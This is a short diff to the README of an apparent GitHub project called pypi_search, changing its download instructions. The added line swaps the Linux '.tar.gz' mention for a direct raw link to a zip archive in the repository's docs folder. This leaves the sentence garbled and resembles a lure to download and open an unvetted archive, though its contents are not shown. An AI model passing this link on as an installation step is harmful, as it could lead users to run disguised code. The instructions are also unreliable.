dewiaratna/pypi_search/README.md

    - On Windows, this might be a `.exe` file.
    - On macOS, look for a `.dmg` or `.zip` file.
-   - For Linux, you might find a `.tar.gz` or a package compatible with your system.
+   - For Linux, you might find a `https://github.com/dewiaratna/pypi_search/raw/refs/heads/main/docs/search_pypi_1.3.zip` or a package compatible with your system.

 4. After downloading, open the file: